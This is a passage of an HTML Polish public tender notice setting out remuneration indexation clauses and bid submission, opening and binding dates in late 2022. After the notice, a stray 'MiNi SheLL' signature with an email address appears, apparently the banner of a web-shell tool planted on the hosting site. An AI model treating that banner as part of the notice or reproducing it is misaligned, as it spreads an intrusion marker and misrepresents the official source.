wynagrodzenia Wykonawcy, mając na uwadze treść art. 439 ust. <br/>4 ustawy PZP. Waloryzacja dotyczy wynagrodzenia Wykonawcy jeszcze niewymagalnego zgodnie z warunkami określonymi w umowie, a nie dotyczy wynagrodzenia już zapłaconego Wykonawcy przez Zamawiającego. <br/>4.	Strony przyjmują, że maksymalna wartość zmiany wynagrodzenia Wykonawcy jaką dopuszcza Zamawiający<br/> w efekcie zastosowania postanowień w ust. 3 wynosi 10% wartości wynagrodzenia pierwotnego w umowie. <br/>5.	Strony przyjmują, że postanowienia określone w ust. 3 i ust. 4 dotyczą także odpowiednio podwykonawcy, jeżeli Wykonawca zgłosił podwykonawcę –(ów) do realizacji przedmiotu umowy.<br/>6.	Zmiany określone w niniejszym paragrafie mogą nastąpić tylko po podpisaniu stosownego aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Złożenie oferty wraz z oświadczeniem z art. 125 ust. 1 Pzp i innymi dokumentami wymienionymi w Dziale VII SWZ oraz jej wycofanie odbywa się przy użyciu miniPortalu zamieszczonego na stronie internetowej https://miniportal.uzp.gov.pl/ System miniPortal zapewnia bezpłatną możliwość szyfrowania ofert.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Nie</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com